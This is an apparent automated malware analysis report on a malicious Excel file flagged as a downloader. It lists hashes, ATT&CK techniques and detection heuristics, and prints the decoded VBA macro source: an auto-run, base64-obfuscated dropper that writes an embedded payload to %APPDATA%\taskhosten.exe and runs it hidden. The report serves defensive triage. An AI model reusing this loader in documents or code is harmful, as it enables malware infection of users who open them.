Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a52ba498d304906d…

MALICIOUS

Office (OLE)

Size: 68.0 KB
Created: 2015-11-16 14:31:26
Authoring application: Microsoft Excel
First seen: 2020-09-07
MD5: 180fe86db301b9ad3f2ad6b6a12b3411
SHA-1: d245e02922513612d9babad8f50115b94588781b
SHA-256: a52ba498d304906d6c060e8c56ad7db50e1af0a781616c0aa35447c50c28bae9
Risk score: 358

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The file contains obfuscated VBA macros, including AutoOpen and Workbook_Open, which are designed to execute automatically. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates the macro uses a custom decoder and calls CreateObject and Shell functions. The 'SE_ENABLE_LURE' heuristic suggests the document prompts the user to enable macros. The script attempts to create a 'WScript.Shell' object, likely to download and execute a secondary payload, as indicated by the 'CLAMAV_DETECTION' for Win.Downloader.Carp.

Heuristics (11)

  • ClamAV: Win.Downloader.Carp-6307520-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Downloader.Carp-6307520-0
  • VBA macros detected (medium, 6 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (critical, OLE_VBA_SHELL)
    Matched lines in script:
      Shell uzwlcaktigemqvucvzix, vbHide
      End Sub
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched lines in script:
      On Error Resume Next
      Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    Matched lines in script:
      On Error Resume Next
      Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    Matched lines in script:
      Sub AutoOpen()
      showDatagram
  • Workbook_Open macro (low, OLE_VBA_WBOPEN)
    Matched lines in script:
      End Sub
      Sub Workbook_Open()
      showDatagram
  • Heap-spray pattern detected (high, SC_HEAP_SPRAY)
    Repeated 0x41 (A) bytes found
    Disassembly: attempted x86 opcode disassembly of the repeated-byte region
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8433 bytes
SHA-256: 2f6ac28861387d5f7fc368eba769e14602863b7c6ab77ba6e4ae4550b43bbe41
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Sub showDatagram()

 On Error Resume Next
Set hqdhfwoybiyesyjvigoz = CreateObject(LVFEnuYuOL("V1NjcmlwdC5TaGVsbA=="))

Dim La, uzwlcaktigemqvucvzix As String
La = La + "wAAAAAAAAAAX0NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
La = La + "CAAAAwAAADwNwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="

uzwlcaktigemqvucvzix = hqdhfwoybiyesyjvigoz.ExpandEnvironmentStrings(LVFEnuYuOL("JUFQUERBVEEl")) & LVFEnuYuOL("XHRhc2tob3N0ZW4uZXhl")

Set wawescrknzcukmwelbsx = CreateObject(LVFEnuYuOL("QURPREIuU3RyZWFt"))
wawescrknzcukmwelbsx.Open
wawescrknzcukmwelbsx.Type = 1
wawescrknzcukmwelbsx.Write merde(La)
wawescrknzcukmwelbsx.Position = 0
wawescrknzcukmwelbsx.SaveToFile uzwlcaktigemqvucvzix
wawescrknzcukmwelbsx.Close
 
 Shell uzwlcaktigemqvucvzix, vbHide
 End Sub

Private Function merde(bobby)
  Dim DM, EL
  Set DM = CreateObject(LVFEnuYuOL("TWljcm9zb2Z0LlhNTERPTQ=="))
  Set EL = DM.createElement(LVFEnuYuOL("dG1w"))
  EL.DataType = LVFEnuYuOL("YmluLmJhc2U2NA==")
  EL.Text = bobby
  merde = EL.NodeTypedValue
End Function

Function LVFEnuYuOL(ByVal yyPdMVSXBI)
  Const HEgTymDLVn = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  yyPdMVSXBI = Replace(yyPdMVSXBI, vbCrLf, "")
  yyPdMVSXBI = Replace(yyPdMVSXBI, vbTab, "")
  yyPdMVSXBI = Replace(yyPdMVSXBI, " ", "")
  
  dataLength = Len(yyPdMVSXBI)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "LVFEnuYuOL", ""
    Exit Function
  End If

  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0
    For CharCounter = 0 To 3
      thisChar = Mid(yyPdMVSXBI, groupBegin + CharCounter, 1)
      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, HEgTymDLVn, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "LVFEnuYuOL", ""
        Exit Function
      End If
      nGroup = 64 * nGroup + thisData
    Next
    nGroup = Hex(nGroup)
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    sOut = sOut & Left(pOut, numDataBytes)
  Next
  LVFEnuYuOL = sOut
End Function

Sub AutoOpen()
showDatagram
End Sub
Sub Workbook_Open()
showDatagram
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True